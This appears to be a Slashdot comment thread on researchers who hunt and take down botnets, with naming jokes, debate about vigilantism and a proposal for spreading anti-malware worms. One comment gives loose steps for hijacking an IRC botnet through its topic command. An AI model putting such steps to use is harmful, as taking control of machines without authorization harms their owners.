... fighting back the internet scumbags all over the planet, vigilante style...

Now if they could just have a cool name, we could have a new hit superheroes movie for this summer.

Any suggestion anyone ?
- The League of Net Shadows
- The League of Extraordinay Nerds
- The Fantastic Fourty

Come on give me something better ...

Re: Whats their name? = drone hunters (1)

coekie (603995) | more than 9 years ago | (#12858744)

The name actually used is "drone hunters"

Re:The new superheroes...(whats their name?) (1)

77Punker (673758) | more than 9 years ago | (#12858765)

Secure Internet Alliance

That's kinda cool, but I'm sure somebody can do better.

Re:The new superheroes...(whats their name?) (5, Funny)

UserChrisCanter4 (464072) | more than 9 years ago | (#12859042)

In honor of one of the common infection vectors: The Active X-Men.

Of course, the need to acknowledge both genders would probably make Active X-Force or Active X-Factor a better choice.

What's good for the goose... (4, Interesting)

argStyopa (232550) | more than 9 years ago | (#12858738)

So, how is this different from a "Star Chamber"?

I'd be interested to see how many people in /. who might applaud this pro-active white-hattery, who simultaneously strenuously object to the US Patriot act which is pretty much just allowing the government to do the same thing in real life?

book deal (1)

BobVila (592015) | more than 9 years ago | (#12858748)

THey should write a book about this. It will be like a modern day Cuckoo's Egg.

Since malware writers aren't held liable... (1)

suitepotato (863945) | more than 9 years ago | (#12858808)

...and likely because their wares are useless until activated by an idiot enduser but mostly because government neither is competent enough to go after this or should be trusted enough, then I don't see why extending antibodies to the malware problem doesn't deserve a shot.

With honeypots and careful use of infectable machines, the code that makes up these beasts can be examined and anti-malware can be released into the wild to destroy the infections whereever the anti-malware gets installed by an end-user.

"Wow, I just cleaned spyware off my machine by looking for pr0n." Sort of like accidentally giving yourself life-saving medication because someone knew you were a pill popping idiot and they put the right stuff where you'd find it.

The question is, how would the corporate antimalware forces of right now react? "Symantec finds the W32.SpamZapFly2 to be a highly dangerous worm capable of closing far too many open smtp relays (which is eating into our business) and recommends using our new tool to remove it as well as purchasing our latest antivirus software (which will be as ineffective as the last one) instead of relying on accidental infection with this so-called anti-bodyware (because while it has equal chance of happening, we'd prefer to be paid).

omfg (-1, Troll)

f1r3w0rm (893378) | more than 9 years ago | (#12858882)

ok guys why dont you take ur heads out your asses and use google for instance if you wanted to steal a botnet then erase it heres a quick tutorial step 1 make sure topic command is enabled if not well game over unless you have the passcode step 2 if u are able to change topic depending on which trojan made the bot the command can very the standard is .rm to remove step 3 kick em or ctcp version em to rejoin and make the topic take effect __________________________________________________ any comments feel free to contact me @ sopsecurity{{{AT}}}gmail.com

C&C? (2, Insightful)

VStrider (787148) | more than 9 years ago | (#12858975)

I thought there was no such thing as a central C&C on botnets. An infected pc, can be a member of many botnets. Today a pc is doing the bidding of joe hax0r, tomorrow is doing the bidding of billy rox0r. Even if you shut down one C&C, the thousands of infected pcs, remain infected and ready to join another botnet.

The only sollution is user education.

Typical freeloaders (4, Funny)

Anonymous Coward | more than 9 years ago | (#12859012)

Using data from IP flows passing through routers and reverse-engineering tools to peek under the hood of new Trojans, Thompson said the researchers are able to figure out how the botnet owner sends instructions to the compromised machines.

This is a blatant violation of the trojans' EULAs if I ever saw one. The authors put a lot of work into writing those trojans. What gives "security researchers" such a sense of entitlement to that code? If they want to analyze malware, they should write their own!

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...